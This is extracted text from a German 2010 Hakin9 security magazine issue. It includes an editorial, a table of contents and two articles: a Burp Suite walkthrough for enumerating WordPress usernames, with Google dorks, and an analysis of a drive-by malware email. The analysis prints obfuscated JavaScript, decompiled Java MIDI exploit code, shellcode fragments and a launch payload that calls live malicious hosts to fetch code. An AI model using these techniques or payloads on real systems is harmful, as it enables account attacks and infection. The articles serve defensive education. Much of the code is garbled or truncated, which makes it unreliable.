Magazin als PDF - Bites, Bytes and my 5 cents - portfolio

LIEBE HAKIN9 LESER, 

Das Hauptthema dieser Ausgabe von Hakin9 ist Penetration Testing. Im Jahr 

2010 ist es kein Problem mehr, ein Netzwerk vor Gefahren zu schützen. Ist 

es wirklich so? 

Darüber erfahren Sie aus dem Artikel von Dimitri Roschkowski “Penetration 

�� 

Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun 

�� 

Schadsoftware installieren. Das eleven Research-Team hat ein Beispiel näher 

�� 

Peick “Malware-Doppelschlag per JavaScript und JavaApplet“ in der Rubrik 

Fortgeschrittene. 

In der letzten Ausgabe hat Andreas Lentwojt ausführlich die Norm ISO/IEC 

27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben. Ein 

Teil dieser Familie ist die ISO 27005, die sich mit dem IT-Risikomanagement 

befasst. In der heutigen Ausgabe wird der Autor in dem Artikel “IT- 

Risikomanagement – Wozu brauche ich das?“ darstellen, warum es nützlich 

ist, sich mit dem Risikomanagement der IT zu beschäftigen und dabei auf das 

Modell der ISO 27005 zurück zu greifen. Auf dieses Thema wurde bereits in 

einer früheren Ausgabe eingegangen, in diesem Artikel wird aber mehr auf die 

Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen. 

Heutzutage sind wir überall von Computern umgeben. In der IT-Branche 

herrscht trotzdem ein Frauenmangel. Warum ist es so? Woraus resultieren die 

Vorurteile gegen die Frauen, die sich mit Computern beschäftigen? Wie sieht 

die Situation von Frauen in der IT-Branche aus? 

Auf diese und viele andere Fragen antwortet unsere Gesprächspartnerin 

Ulrike Peter im Interview „Erfolgreiche Frauen in der IT-Branche - ein 

Erfahrungsbericht“, das in dieser Ausgabe von Hakin9 besonders zu empfehlen 

ist. 

Sie möchten unser Heft jeden Monat automatisch bekommen? Nichts einfacher 

als dies. Registrieren Sie sich für unseren Newsletter auf www.hakin9.org/ 

de und Sie werden regelmäßig jede Hakin9 Ausgabe in Ihrem E-Mail-Account 

�� 

schickt. 

Ich hoffe, dass wir mir dieser Ausgabe Ihren Herausforderungen gewachsen 

sind. 

Viel Spaß beim Lesen! 

�� 

5/2009 HAKIN9 

4

INHALTSVERZEICHNIS 

FÜR EINSTEIGER 

06 User Enumeration bei Web-Applikationen 

Kai Renz 

Wo der normale Benutzer nicht hin soll, wo wichtige 

Daten nur für einen kleinen Kreis an Personen zugänglich 

sein sollen, wo administrative Aufgaben erledigt 

werden - überall dort werden Authentifizierungen eingesetzt. 

herausgegeben vom Verlag: 

Software Press Sp. z o. o. SK 

Geschäftsführer: �� 

Managing Director: �� 

ewa.lozowicka@software.com.pl 

Chefredakteurin:�� 

ilona.przybyslawska@software.com.pl 

Redaktion/Betatester: Kai Renz, Michael 

Peick, Dimitri Roschkowski, Helmut Kaufmann, 

Andreas Lentwojt, Patrick Schmid, 

Tobias Glemser, Ulrike Peter, Nicole Huck, 

Michael Schratt 

Produktion: Andrzej Kuca 

DTP: �� 

Umschlagsentwurf: �� 

Werbung: adv@software.com.pl 

Anschrift: 

Software Press Sp. z o.o. SK 

ul. Bokserska 1, 02-682 Warszawa, Poland 

Tel. +48 22 427 36 56, Fax +48 22 244 24 59 

www.hakin9.org/de 

Die Redaktion bemüht sich, dafür Sorge zu 

tragen, dass die in der Zeitschrift sowie auf 

den begleitenden Datenträgern erhaltenen 

Informationen und Anwendungen zutreffend 

und funktionsfähig sind, übernimmt jedoch 

keinerlei Gewähr für derer Geeignetheit für 

bestimmte Verwendungszwecke. Alle Markenzeichen, 

Logos und Handelsmarken, die 

sich in der Zeitschrift befinden, sind registrierte 

oder nicht-registrierte Markenzeichen 

der jeweiligen Eigenümer und dienen nur als 

inhaltliche Ergänzungen. 

FORTGESCHRITTENE 

10/2010 

11 Malware-Doppelschlag per JavaScript und 

JavaApplet 

Michael Peick 

Besonders in diesem Jahr steigt die Anzahl der E-Mails 

die ohne Zutun des Anwenders oder nur mit sehr wenig 

Einflussnahme des Anwenders Schadsoftware installieren. 

Das eleven Research-Team hat ein Beispiel 

näher untersucht. 

PRAXIS 

17 Penetration Testing im Jahre 2010 

Dimitri Roschkowski 

Viele Administratoren übersehen leider bei der Absicherung 

des Netzwerkes seine physikalische Sicherheit. 

Die Bedrohung kommt nicht nur durch das Ethernet-Kabel. 

ABWEHR 

25 OCTAVE – Hier macht das Risiko die Musik 

Helmut Kaufmann 

Die überwiegende Mehrheit von Unternehmen sind 

nach regulativen Vorgaben wie z.B. Basel II, Solvency 

II, SOX, 8. EU Auditrichtlinie oder SAS 70 angehalten 

ein nachhaltiges und nachvollziehbares Risikomanagement 

und Business Continuity Planning zu implementieren. 

Anmerkung! 

Die in der Zeitschrift demonstrierten Techniken 

sind AUSSCHLIEßLICH in eigenen Rechnernetzen 

zu testen! Die Redaktion übernimmt 

keine Haftung für eventuelle Schäden oder 

Konsequenzen, die aus der unangemessenen 

Anwendung der beschriebenen Techniken 

entstehen. Die Anwendung der dargestellten 

Techniken kann auch zum Datenverlust führen! 

hakin9 erscheint in folgenden Sprachversionen 

und Ländern: deutsche Version (Deutschland, 

Schweiz, Österreich, Luxemburg), französische 

Version (Frankreich, Kanada, Belgien, Marokko), 

spanische Version (Spanien, Portugal), 

polnische Version (Polen), englische Version 

(Kanada, USA) 

4 6/2010

30 IT-Risikomanagement – Wozu brauche ich 

das? 

Andreas Lentwojt 

In der letzen Ausgabe habe ich Ihnen ausführlich die 

Norm ISO/IEC 27001 vorgestellt und einen kurzen Einblick 

in die 27000-Familie gegeben. Ein Teil dieser Familie 

ist die ISO 27005, die sich mit dem IT-Risikomanagement 

befasst. 

ANGRIFF 

37 DNS Cache Poisoning 

Patrick Schmid 

Als Ergänzung zu meinem ersten Artikel Java Applet 

Attacke erfahren wir hier, wie wir ein Opfer mittels DNS 

Spoofing unbemerkt eine präparierte Seite unterschieben 

können. 

INTERVIEW 

41 Interview mit Tobias Glemser 

„Sicherheit darf nicht erst am Ende von neuen Anwendungen, 

Produkten oder Projekten als Kontrollinstrument 

einbezogen, sondern muss als integraler und vor 

Allem unterstützender Bestandteil eines erfolgreichen 

Produkts gesehen werden.“ 

Mehr erfahren Sie aus dem Interview mit Tobias Glemser 

– leitender IT-Sicherheitsberater bei der Tele-Consulting 

security networking training GmbH in Gäufelden 

bei Stuttgart und verantwortlich für den Geschäftsbereich 

Penetrationstests. 

InhaltsverzeIchnIs 

44 Interview mit Ulrike Peter 

„Die IT ist (und bleibt es sicher auch) eine Männerdomäne 

– Frauen in der IT-Branche sind Paradiesvögel.“ 

Mehr erfahren Sie aus dem Interview mit Ulrike Peter – 

freie Journalistin und seit zehn Jahren für unterschiedliche 

Unternehmen und Medien in der IT-Branche tätige 

PR-Spezialistin. 

REZENSIONEN 

46 SAP for DFPS Implementierung und Customizing 

Nicole Huck 

Das Buch SAP for DFPS Implementierung und Customizing, 

basiert auf mehr als 20 Jahren Erfahrung, 

die die Autoren insgesamt bei der Entwicklung, Implementierung, 

aber auch Schulung der Lösung sammeln 

konnten. 

Im Zusammenhang mit den Änderungen, die in letzter Zeit in dem 

deutschen Recht stattgefunden haben und die IT-Sicherheit betreffen, 

möchten wir ankündigen, dass hakin9-Abwehrmethoden 

Magazin seinem Profil treu bleibt. 

Unser Magazin dient ausschließlich den Erkenntniszwecken. 

Alle im Magazin präsentierten Methoden sollen für eine sichere IT 

fungieren. Wir legen einen großen Wert auf die Entwicklung von 

einem sicheren elektronischen Umsatz im Internet und der Bekämpfung 

von IT Kriminalität. 

hakin9.org/de 5

6 


User Enumeration bei 

Web-Applikationen 

Kai Renz 

Wo der normale Benutzer nicht hin soll, wo wichtige Daten nur 

für einen kleinen Kreis an Personen zugänglich sein sollen, wo 

administrative Aufgaben erledigt werden - überall dort werden 

Authentifizierungen eingesetz. 

IN DIESEM ARTIKEL ERFAHREN SIE... 

�� 

�� 

�� ren 

�� den 

Das Problem mit solchen Authentifizierung ist, 

dass sie nur maximal so sicher sind, wie ihr 

schwächstes Glied. Durch das Web 2.0 wird immer 

mehr auf Komfort und Benutzerfreundlichkeit gesetzt, 

wodurch einfache Sicherheitsmechanismen ihre 

Wirkung verfehlen. Bruteforce Angriffe galten durch 

die schier unendlichen Kombinationsmöglichkeiten als 

„nicht mehr praktikabel“. Viele Seiten erlauben es uns 

aber, die Anzahl an Versuchen drastisch einzuschränken, 

da sie Informationen preisgeben, die einen Angriff 

oftmals bedeutend einfacher machen. 

Wenn Sie sich heute im Internet herumtreiben, finden 

Sie sich zwischen Social Networks, Auktionsplattformen 

und Tauschbörsen wieder. Identitäten werden im 

Netz frei und für jedermann zugänglich eingestellt, und 

manch einem kommt es vor, wie wenn er durch Twitter 

und Co. mehr über seinen Nachbarn wüsste, wie 

über seinen langjährigen Freund. Obwohl viele immer 

noch der Ansicht sind, sich frei und anonym im Internet 

bewegen zu können, so stellen sie doch Details über 

ihr Leben jedem frei zur Verfügung. Sie denken ein frei 

erfundener Benutzername halte die meisten davon ab 

ihre wahre Identität herauszufinden? Lassen Sie sich 

gesagt sein das dies ein Irrtum ist – ein sehr großer Irrtum! 

Die Gefahr, die all dies mit sich bringt, ist leicht zur 

erklären: Stellen Sie sich vor, sie arbeiten in einem großen 

Telekommunikationsunternehmen. Über Facebook 

und Xing halten Sie gerne Kontakt mit Kollegen aus 

WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN... 

�� 

�� 

dem Ausland – dafür sind diese Plattformen ja schließlich 

auch bestens geeignet. Doch was, wenn jemand ihr 

Konto übernimmt und unter Ihrem Namen dort Humbug 

treibt? Stellen Sie dies nicht sofort fest, so kann diese 

Internetplattform schnell zu einem sehr großen Problem 

werden. Schon bei der Anmeldung bei diesen Seiten legen 

wir unsere wichtigen Daten in die Hände der Betreiber, 

ohne das uns eigentlich wirklich interessiert, wofür 

diese weiter verwendet werden. Erst wenn mal wirklich 

ein großer Skandal an die Oberfläche dringt, herrscht 

Empörung und die allgemeine „ich hab‘s doch gesagt“- 

Stimmung kommt auf. Bei Spammern und Crackern 

sind Accounts zu Auktionsplattformen, Email-Konten 

und Social Networks sehr beliebt da viele Benutzer für 

mehrere Zugänge das selbe Passwort verwenden und 

so zum Beispiel durch den eBay-Account auf Rechnung 

des Opfers eingekauft werden kann. Ein Benutzer kann 

hier nur wenige, trotzdem aber effektive Maßnahmen 

ergreifen. Ein sicheres Passwort zu wählen ist der erste 

und wichtigste Schritt, wobei immer mehr Passwörter 

über nicht-verschlüsselte Verbindungen und Keylogger 

abgefangen werden und somit auch das sicherste Passwort 

nutzlos ist. Ein zweiter Schritt wäre verschiedene 

Passwörter für die unterschiedlichen Seiten zu verwenden 

und diese regelmäßig zu erneuern. Dieser Schritt 

wird aber leider nur sehr selten wirklich umgesetzt, da 

er mit grossem Aufwand verbunden ist und die meisten 

Benutzer keine Lust haben sich mehrere verschiedene 

9/2010

Passwörter zu merken. Oftmals werden zwar viele verschiedene 

Zugangsdaten verwendet, durch das häufige 

wechseln, werden dann aber eher einfache Passwörter 

verwendet, damit der Benutzer sich diese leicht merken 

kann. 

Um einen Zugang zum Benutzerkonto des Anwenders 

zu bekommen, sind meist ein Benutzername und 

ein Passwort nötig. Oftmals fangen hier schon die Probleme 

an. Hat der Angreifer herausgefunden, dass sich 

die Benutzer durch eine Email-Passwort-Kombination 

anmelden können, muss er schon mal viel weniger Zeit 

investieren, den Benutzernamen herauszufinden, was 

bei einem Bruteforce-Angriff ein Zeitvorteil sein, welcher 

zwischen durchführbar und nicht durchführbar, also 

Erfolg und Misserfolg entscheidet. Oftmals reicht also 

schon eine simple Registrierung bei einer Zielseite 

um die Feinheiten einer Anmeldefunktion herauszufinden 

und auszunutzen. Kann ein Benutzer seinen Nicknamen 

frei wählen, so sind die Möglichkeiten bei einem 

Bruteforce-Angriff wieder immens, sodass der Angreifer 

eine andere Taktik wählen muss. Er wird versuchen 

ohne mühsames Durchprobieren von Kombinationen 

an den Benutzernamen zu kommen oder einen anderen 

Schwachpunkt im System ausnutzen. In diesem 

Artikel werde ich ein paar einfache Möglichkeiten darstellen 

um einer Web-Applikation Benutzernamen zu 

entlocken (User Enumeration) und diese automatisch 

aufzunehmen. 

Wie bereits oben beschrieben kann sich der Angreifer, 

sofern er dazu berechtigt ist, zuerst ein Bild vom Registrierungs- 

bzw. Login-Mechanismus machen. Findet 

er beispielsweiße heraus dass der Benutzername eine 

Mailadresse ist, so kann er leicht Suchmaschinen oder 

Social Networks verwenden, um diese herauszufinden. 

Werden frei wählbare Benutzernamen verwendet, so 

fällt diese Art von Recherche weitestgehend aus, wobei 

natürlich auch hier manchmal ein Glückstreffer dabei 

sein kann. In so einem Fall wird der Angreifer aber 

Abbildung 1. Funktionsweiße einfache User Enumeration 

User Enumeration bei Web-Applikationen 

Request Response 

Benutzername: 1a2a3d4f 

Passwort: sosecret 

Benutzername: foobar 

Passwort: sosecret 

Bruteforce 

Benutzername: foobar 

Passwort: topsecret 

anders vorgehen: er überprüft den Login-Mechanismus 

auf Ausgaben, welche den Benutzernamen verraten 

oder Hinweise darauf geben könnten ob der zum Test 

angegebene Name ein wahrer Benutzername ist. Hinweise 

darauf geben Rückgaben wie „Das für diesen Benutzernamen 

angegebene Passwort ist nicht korrekt!“ 

oder ähnliches. Gegengeprüft werden kann dies durch 

die Eingabe eines fiktiven Benutzers. Variiert die Ausgabe 

von der obigen so ist es sehr wahrscheinlich dass 

der zuvor verwendete Name korrekt war. 

Ein weiterer Angriffsvektor ist die „Passwort-vergessen-Funktion“. 

Ist solch eine Funktion schlecht geschrieben, 

oder ist diese einfach nur zu leichtsinnig 

dem Benutzer Komfortfunktionen anzubieten, können 

für den Angreifer wichtige Informationen preisgeben 

werden. Eine Fehlkonfiguration, bzw. leichtsinnige Web 

2.0 Funktion, wie die eben angesprochene, kann zum 

Beispiel bei Eingabe der Mailadresse auf der Passwort- 

Vergessen-Seite mit einem Satz wie „Eine Email mit 

Ihrem neuen Passwort für den Benutzeraccount 

wurde erfolgreich an Sie zugestellt“ antworten, 

wodurch der wahre Benutzer zwar eine Email, der Angreifer 

jedoch auch den Benutzernamen erhält. Ist die 

angegebene Sicherheitsadresse inaktiv oder wird nur 

sporadisch verwendet, so geht diese Email leicht unter 

und der Angreifer kann mit seiner Arbeit fortfahren. 

Ein gutes Beispiel hierfür ist Wordpress. Auch in seiner 

neuesten Version kann über die „Passwort-vergessen- 

Funktion“ der Benutzername herausgefunden werden. 

Ein sogenannter Bot-Schutz ist nicht vorhanden, sodass 

wir das ganze mit einem Webproxy, in unserem 

Fall Burpsuite, automatisieren können. 

Durch eine lokale Recherche an einem Wordpress 

haben wir herausgefunden, dass beim Eingeben eines 

falschen Benutzernamens ein Fehler zurückgegeben 

wird: ERROR: Invalid username or e-mail. Verwenden 

wir jedoch den richtigen Benutzernamen erhalten wir 

ein: Check your e-mail for the confirmation link. 

Benutzer oder Passwort falsch 

Falsches Passwort 

Login erforgreich! 

hakin9.org/de 7

8 

Nun müssen wir uns genauer ansehen was zwischen 

unserem Client und dem Webserver kommuniziert wird. 

Hierfür starten wir Burpsuite und konfigurieren unseren 

Browser so dass er als Proxy localhost auf Port 8080 

verwendet. Als nächstes wechseln wir in den Proxy-Tab 

und setzen Intercept auf Off. Durch das Deaktivieren 

dieser Funktion verhindern wir, das uns Burpuite bei 

jedem Schritt frägt, ob wir die Daten wirklich zu unserem 

Webserver senden wollen. Als nächstes besuchen 

wird unsere Zielseite. Wordpress verwendet immer 

das gleiche Schema: http://www.zielseite.de/wp-login. 

php?action=lostpassword. Wir geben absichtlich einen 

falschen Benutzernamen an und verfolgen wie die 

Abbildung 2. Unser POST-Request an Wordpress 

Abbildung 3. Der Parameter der verändert werden soll wird markiert 


POST-Anfrage und deren Antwort von Burpsuite aufgezeichnet 

werden. Dort können wir unter request -> params 

unsere gerade eingegebenen und noch weitere 

Daten betrachten (Abbildung 2). 

Als nächstes senden wir den Request per Rechtsklick 

an den Intruder. Das Target-Tab lassen wir unberührt, 

wir werden erst bei den Positions-Optionen aktiv. 

Wir klicken rechts auf „clear $“. Als Attacke verwenden 

wir Sniper. Ganz unten im Textfeld sehen wir eine Zeile 

mit „user_login“. Dies sind die Parameter die per POST 

übergeben werden. Ich markiere den zum Test eingegebenen 

Benutzername und klicke auf „add $“ (Abbildung 

3). 

9/2010

Nun müssen wir noch unser Payload konfigurieren. Hier 

verwenden wir „Payload Set 1, present list“. Man kann nun 

optional eine ganze Liste mit Benutzernamen laden, oder 

einfach per Hand einige eintragen. Nun müssen wir noch 

unterscheiden lassen wann ein Benutzer gefunden wurde 

und wann nicht. Dazu gehen wir in den Option-Tab und 

scrollen zu grep. Wir aktivieren die Checkboxen bei „search 

responses for these expressions“ und „simple pattern 

match“. Außerdem drücken wir auf clear. Die voreingestellten 

Pattern brauchen wir nicht zu verwenden. Wir wissen 

dass bei Eingabe eines existierenden Benutzernamens ein 

„Check your e-mail for the confirmation link“ zurückgeliefert 

wird. Also tragen wir genau diesen Satz ein und klicken auf 

add. Nun geben wir noch an, dass wird redirects folgen wollen. 

Damit haben wir alles nötige konfiguriert. Wir klicken 

in der Menuleiste auf intruder -> start attack. Nach einer 

kurzen Zeit erhalten wir erste Ergebnisse - der Intruder hat 

zwei Benutzer identifiziert (Abbildung 3)! Eine gute Wörterliste 

erhöht die Effizient natürlich deutlich! 

Somit konnten wir leicht über die Passwort-Vergessen 

Funktion automatisiert Benutzer erfassen. Natürlich 

User Enumeration bei Web-Applikationen 

Abbildung 4. Burpsuite Intruder hat zwei Benutzer identifizieren können 

Listing 1. Google Dorks 

inurl:memberlist.php "Powered by phpBB" 

��:php "memberlist" 

��:txt "memberlist" 

��:txt "usernames" 

��:sql "users" 

funktioniert dies auch mit Registrierungssystemen die 

angeben ob ein Benutzername schon vergeben ist. Den 

Möglichkeiten sind hier nur durch die eigene Kreativität 

Grenzen gesetzt. Mit dieser simplen Methode gelingt 

es einem Angreifer automatisiert Benutzernamen zu finden 

– doch was kann noch passieren? 

Eine oft übersehene Tatsache ist dass das Problem 

oft vor der Tastatur sitzt. Sprich, der Admin hat etwas 

falsch konfiguriert. So kann es vorkommen dass ganze 

Mitgliederlisten in Foren öffentlich zugänglich sind 

oder im Cache von Suchmaschinen gefunden werden 

können. Durch Suchmaschinen wie Google lassen sich 

solche falsch konfigurierten Seiten leicht auffinden. Eine 

kleine Liste an Google Dorks ist in Listing 1 angegeben. 

Eine weitere Möglichkeit Benutzernamen zu identifizieren 

sind URLs. Twitter ist hier ein schönes Beispiel. 

Jeder Benutzer kann sich unter twitter.com/benutzername 

austoben. Dies stellt eine weitere Möglichkeit dar 

automatisch Namen zu entlarven. Wie bereits erwähnt 

gibt es unzählige Möglichkeiten User Enumeration zu 

betreiben wodurch Bruteforce eine nicht zu unterschätzende 

Möglichkeit bleibt. 

KAI RENZ 

Der Autor befindet sich gerade in Ausbildung zum Fachinformatiker 

für Systemintegration. In seiner Freizeit beschäftigt 

er sich mit Themen rund um IT-Sicherheit und Penetration Testing. 

Kontakt mit dem Autor: kai.renz@proof-of-concept.org 

hakin9.org/de 9

2010 

www.sigs-datacom.de 

Kontakt: Anja Keß, · Lindlaustraße 2c, D-53842 Troisdorf, 

Tel.: +49 (0) 22 41 / 23 41-201 · Fax: +49 (0) 22 41 / 23 41-199 · Email: anja.kess@sigs-datacom.de 

Erfolgreich durch Wissensvermittlung aus 1. Hand 

� Die ultimative Hacking-Akademie 

� Erfolgreiche Abwehr von Hacker-Angriffen und 

sicherer Schutz Ihres Netzwerks 

Klaus Dieter Wolfinger 

20. – 22. September 2010 

03. – 05. November 2010, Frankf./M. 2.150,- € zzgl. MwSt. 

� Best Practices für sichere Web-Anwendungen 

� Sicherheitslücken in Webanwendungen vermeiden, 

erkennen und schließen – gemäß Empfehlung des BSI 

Thomas Schreiber 

25. – 26. Oktober 2010, Düsseldorf 

08. – 09. Dezember 2010, München 1.590,- € zzgl. MwSt. 

� Sicherheit mit WebService-Infrastrukturen 

Jörg Bartholdt 

25. – 26. Oktober 2010, 

22. – 23. November 2010, München 1.590,- € zzgl. MwSt. 

� Cloud Computing im praktischen Einsatz 

Arnd Kleinbeck & Stefan Tilkov 

24. Oktober 2010, München 

10. Dezember 2010, Köln 990,- € zzgl. MwSt. 

� iPhone Grundlagen und Entwicklung 

Hendrik Schreiber 

11. – 12. Oktober 2010, Köln 

11. – 12. Dezember 2010, Köln 1.590,- € zzgl. MwSt. 

www.sigs-datacom.de 

� NEU – jetzt 3-tägig: 

CSM Certified ScrumMaster Course 

� Voraussetzung für die Zertifizierung zum Scrum Master 

Sabine Canditt 

25. – 27. Oktober 2010, München 


� Secure Coding mit Java EE 

� Entwicklung einbruchssicherer Webanwendungen 

und Webservices unter Java EE 

Mirko Richter 

26. – 27. Oktober 2010, 


� Web Application Firewall Starter 

� Essentielles Web Application Firewall Grundwissen 

Achim Hoffmann 

17. November 2010, München 990,- € zzgl. MwSt. 

� Advanced Web Application Security Testing 

� Professionelle Sicherheitsuntersuchungen von 

Enterprise-Webanwendungen durchführen 

Thomas Schreiber 


www.sigs-datacom.de

Malware-Doppelschlag per JavaScript und JavaApplet 

Malware-Doppelschlag per 

JavaScript und JavaApplet 

Automatischer Download durch JavaScript und 

Ausbruch aus der Virtuellen Java Umgebung 

Michael Peick 

Besonders in diesem Jahr steigt die Anzahl der E-Mails 

die ohne Zutun des Anwenders oder nur mit sehr wenig 

Einflussnahme des Anwenders Schadsoftware installieren. 

Das eleven Research-Team hat ein Beispiel näher untersucht. 


�� 

wird. 

Es handelt sich dabei um eine E-Mail die massenhaft 

versandt wird und eine Website/HTML-Datei 

als Anhang enthält. Die E-Mail hat eine unverfängliche 

Betreffzeile wie „Re: Vacation“ oder „Randolph 

Plans“ und einen ebenfalls unverdächtigen Text 

wie beispielsweise: 

„Thank you very much for meeting with me on Saturday. 

Attached are the plans for the Randolph Street Development 

project we discussed. If you have any questions 

please don't hesitate to contact me. 

Thanks again.“ 

Im HTML-Anhang befindet sich ein eingebetteter 

JavaScript Code. Um die Erkennung des JavaScript 

Codes zu erschweren, wurde er verschleiert/unleserlich 

gemacht, in der Fachsprache auch als Obfuscation bezeichnet 

(vgl. Listing 1.). 

Listing 1. Die Datei "39035xls.html": 


�� - 

Script und HTML. 

Wird die Datei "39035xls.html" im Anhang im Browser 

aufgerufen, dann wird der Nutzer mittels des JavaScripts 

an eine bestimmte Internetseite weitergeleitet, 

die Schadcode enthält. Schreibt man das JavaScript- 

Codefragment leserlicher, dann sieht man, dass eine 

Weiterleitung zur Seite "http://numerouno-india.com/x. 

html" führt 1 (vgl. Listing 2.). 

Auf der weitergeleiteten WebSite sieht man eine 

weitere Weiterleitung an die URL "http://scaner-g. 

cz.cc/scanner10/?afid=24". Interessant ist hier nicht 

die Weiterleitung an eine weitere Seite, sondern die 

Tatsache, dass ein unsichtbares iFrame mit Breite 

0 Pixel und Höhe 0 Pixel geladen wird. Schauen 

wir uns die dahinterliegende Seite "http://arestyute. 

com/sadhbdsa879321jbdas/index.php" etwas genauer 

an (vgl. Listing 3.). 

function etgr(zj4r){var\nbo97,bvgy="",kpn8,iyv2="0ocdfu 

m;ip/qrlx=nt.-:v he>s"a;a

12 

Hier ist ein Java-Applet eingebettet, welches beim 

Aufruf der Seite von der Java-Virtual-Machine ausgeführt 

wird, sofern diese im Browser installiert und aktiviert 

ist. Ein weiterer verschleierter JavaScript-Code findet 

sich ebenfalls. 

Zunächst analysieren wir das Java-Applet "tmp/des. 

jar". In der Datei befinden sich drei Java-Klassen von 

denen eine Namens dev.s.AdgredY als Einsprungspunkt 

für das Applet dient. Mit einem Java-Decompiler 

kann man die Klassen, welche momentan in Java-Bytecode 

vorliegen, in leserlichen Java-Quelltext überführen. 

Dies entspricht nicht ganz dem originalem Quelltext, 

kommt ihm aber recht nahe. Wir benutzen dafür 

den Decompiler von http://java.decompiler.free.fr/. 

Schaut man sich nun den Java-Quelltext an, stellt man 

fest, dass keine Obfuscation für Java, wie z.B. das unter 

der GPL 2+ stehende ProGuard, benutzt wurden. 

Was zu erwarten gewesen wäre, um die Erkennung zu 

erschweren. 

Nach einer Verifikation der als Parameter übergebenen 

URL "http://arestyute.com/sadhbdsa879321jbdas/l. 

php?deserialize=6e&i=1" wird abhängig von der Java- 

Listing 2. Weiterleitung an eine weitere Seite 

function etgr(zj4r) { 

var 

bo97, bvgy = "", 

kpn8, iyv2 = "0ocdfum;ip/qrlx=nt.-:v he>s"as"a;a


Listing 3. Seite „http://arestyute.com/sadhbdsa879321jbdas/ 

index.php” (gekürztes HTML Dokument): 

 

 

 

 

 

 

var cmjve3="d.

14 

Listing 4b. Verifikation der als Parameter übergebenen 

URL „http://arestyute.com/sadhbdsa879321jbdas/l. 

php?deserialize=6e&i=1” 

Object localObject1; 




String str20; 

String str21; 

String str22; 

if ((((java_version.indexOf("1.6.0_11") != -1) || 

(java_version.indexOf("1.6.0_12") != -1) || 




(java_version.indexOf("1.6.0_16") != -1) ? 1 : 0) & 

(url.indexOf("i=1") == -1 ? 1 : 0)) != 0) 

{ 

/** 

* Java midi vulnerable, see http:// 

vreugdenhilresearch.nl/2010/05/ 

java-midi-parse-vulnerabilities/ 

* for detailed explaination. The author claims, that it 

was �� in java 1.6.0_19 

*/ 

localObject1 = ""; 

localObject1 = repeat('/', 303); 

/* using windows ? no: return */ 

localObject2 = System.getProperty("os.name"). 

toLowerCase(); 

if (((String)localObject2).indexOf("win") >= 0) 

localObject1 = repeat('/', 302); 

else 

return; 

/* the core of the vulnerable: create a malicious url 

and ask java's midiplayer to play 

*/ 

localObject1 = �� + (String)localObject1 + 

"Z%Z%Z%Z%Z%Z%"; 

try 

Zusätzlich wird noch das oben erwähnte verschleierte 

JavaScript auf der ursprünglichen HTML Seite geladen. 

Dieses ist noch erstaunlicher, denn es enthält gleich eine 

ganze Ladung von Exploits für Java, Adobe Flash 

sowie Adobes PDF Reader bereit. Der ‚Author‘ der Seite 

war auf höchste Kompatibilität aus, denn auch hier 

werden nur bestimmte – vor allem neuere – Versionen 

der Browser Plugins unterstützt (vgl. Listing 5.). 

Unter "http://www.exploit-db.com/exploits/12117/" findet 

man eine Beschreibung der Schwachstelle. Diese 

betrifft zusätzlich zum analysierten Applet die Java Version 

1.6.0_19. 

FORTGESCHRITTENE 

{ 

String str19 = url + "11"; 

localObject4 = ""; 

for (int k = 0; k < str19.length(); k++) 

{ 

localObject4 = (String)localObject4 + Integer. 

toHexString(str19.charAt(k)); 

} 

while (((String)localObject4).length() % 8 != 0) 

{ 

localObject4 = (String)localObject4 + "26"; /* 0x26 = 

'&' */ 

} 

localObject4 = str2 + (String)localObject4; 

this.mem = spray((String)localObject4, str10); 

localObject5 = new URL((String)localObject1); 

MidiSystem.getSequencer(); 

str21 = ""; 

MidiSystem.getSoundbank((URL)localObject5); /*


Listing 5. Codefragment des entschleierten JavaScript 

verdeutlicht das Potential: 

var fdata; 

var skd='%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00% 

ued83% ... %u6870%u0070'; 

var skd1=skd + '%u7468%u7074% ... %u0038%u9000'; 

var skd2=skd + '%u7468%u7074% ... %u0032%u9000'; 

function JAVASMB() { 

try { 

/* see http://www.exploit-db.com/exploits/12117/ for 

exploit description */ 

var u = 'HTTP: -J-jar -J\\bittoram.com\smb\old. 

avi http://arestyute.com/ 

sadhbdsa879321jbdas/l.php?i=2 

none'; 

if (window.navigator.appName == 'Microsoft Internet 

Explorer') { 

try { 

var o = document.createElement('OBJECT'); 

o.classid = 'clsid:CAFEEFAC-DEC7-0000-0000- 

ABCDEFFEDCBA'; 

o.launch(u); 

} catch (e) { 

var o2 = document.createElement('OBJECT'); 

o2.classid = 'clsid:8AD9C840-044E-11D1-B3E9- 

00805F499D93'; 

o2.launch(u); 

} 

das Verbieten von JavaScript 3 , was moderne, Ajaxbasierte 

Internetseiten nahezu unbenutzbar macht, 

hätte auf das Laden des Java Applets keine Auswirkung. 

Wie kann man derartigen heterogenen Bedrohungen 

begegnen? Das häufigste Einfallstor für Schadsoftware 

bleibt die E-Mail. Also ist die Absicherung 

der E-Mail-Kommunikation der erste und wichtigste 

Schritt zur Sicherung des Systems. Moderne Anti-Spam 

und Anti-Virenprogramme sind in der Lage 

Massenmails mit gefährlichen Anhängen zu erken- 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� http://de- 

.wikipedia.org/wiki/Java_Virtual_Machine 

�� 

fox. 

} else { 

var o = document.createElement('OBJECT'); 

var n = document.createElement('OBJECT'); 

o.type = 'application/npruntime-scriptableplugin;deploymenttoolkit'; 

n.type = 'application/java-deployment-toolkit'; 

document.body.appendChild(o); 

document.body.appendChild(n); 

try { 

o.launch(u); 

} catch (e) { 

n.launch(u); 

} 

} 

} catch (e) { 

IEPEERS(); 

} 

IEPEERS(); 

} 

... 

JAVASMB(); 

nen, bevor entsprechende Signaturen bereitstehen. 

Weiterhin sollte der ausgehende E-Mail-Verkehr mit 

gleicher Sorgfalt auf Spam und Viren geprüft werden 

wie der eingehende. Nur so kann man feststellen, 

ob man bereits ungewollt zum Spam- und Virenversender 

geworden ist. Am besten funktioniert dies 

mit einer ausgelagerten E-Mail-Sicherheitslösung, da 

der Anbieter meist von der Masse der empfangenen 

und analysierten E-Mails profitiert, sprich Bedrohungen 

meist schneller erkennt als der einzeln agierende 

Mail-Server-Administrator. Und letzen Endes gilt 

immer noch: Öffnen Sie keine E-Mails oder Anhänge 

von Unbekannten. 

MICHAEL PEICK 

Entwickler und Mitglied des eleven Research Teams 

hakin9.org/de 15

Penetration Testing im Jahre 2010 

Penetration Testing 

im Jahre 2010 

Dimitri Roschkowski 

Viele Administratoren übersehen leider bei der Absicherung 

